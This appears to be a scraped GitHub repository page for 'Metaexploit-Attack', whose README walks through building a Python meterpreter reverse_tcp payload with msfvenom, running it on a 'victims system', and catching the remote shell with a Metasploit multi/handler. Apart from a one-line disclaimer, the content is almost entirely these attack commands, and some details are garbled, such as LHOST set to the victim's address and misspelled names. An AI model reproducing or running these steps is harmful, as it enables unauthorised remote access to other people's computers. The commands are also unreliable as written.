Skip to content

This is Client-Server testing blackdoor. Don't use it for hacking stuff

Notifications You must be signed in to change notification settings

prateektiwari7/Metaexploit-Attack

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 

Repository files navigation

Payload Creation

Installation

Msfvenom —payload=python/meterpreter/reverse_tcp LHOST=VICTIMS_IP LPORT=4444 —out=meterpreter.py

Run Payload at victims system

To run the payload at victims side

python meterpreter.py

Open hackers System

>use exploit/multi/handler 
Enter
>set PAYLOAD python/metepreter/reverse_tcp
Enter
>set LHOST 
Enter
>set LPORT
Enter
>exploit 
To run and access the system 

About

This is Client-Server testing blackdoor. Don't use it for hacking stuff

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published